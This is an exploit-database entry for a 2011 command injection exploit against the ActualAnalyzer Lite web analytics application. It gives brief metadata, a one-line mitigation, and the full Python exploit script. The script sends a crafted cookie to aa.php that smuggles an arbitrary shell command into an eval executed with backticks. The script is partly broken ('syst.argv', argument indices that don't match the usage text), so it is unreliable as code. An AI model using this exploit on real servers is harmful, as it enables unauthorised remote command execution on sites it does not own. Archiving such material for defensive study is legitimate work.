ActualAnalyzer exploit

vendor:

ActualAnalyzer

by:

Anonymous

7,5

CVSS

HIGH

Command Injection

CWE

Product Name: ActualAnalyzer

Affected Version From: Lite version

Affected Version To: Lite version

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

This exploit is used to inject a command into the ActualAnalyzer application. The command is loaded into a dummy variable and then executed with backticks. The exploit is tested on the Lite version of the application.

Mitigation:

Input validation should be used to prevent command injection attacks.

Source

Exploit-DB raw data:

###############################
# ActualAnalyzer  exploit.
# Tested on Lite version 
# We load command into a dummy variable as we only have 6 characters to own the eval 
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################

import urllib
import urllib2
import sys
import time



def banner():
	print "	    ____                        __              __                  __                     "
	print "	   / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  ____ _/ /_  ______  ___  _____"
	print "	  / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_  / / _ \/ ___/"
	print "	 / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/  __/ /    "
	print "	/_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/     "
	print "	             /_/                                                  /____/                   "


def usage():
	print "	[+] Usage:"
	print "	[-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
	print "	[-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""

banner()
if len(sys.argv) < 6:
	usage()
	quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]

def commandexploit(domain,host,command):
	url = 'http://' + domain + '/aa.php?anp=' + host 
	data = None
	headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
	exploit1 = urllib2.Request(url,data,headers)
	exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain,host,command)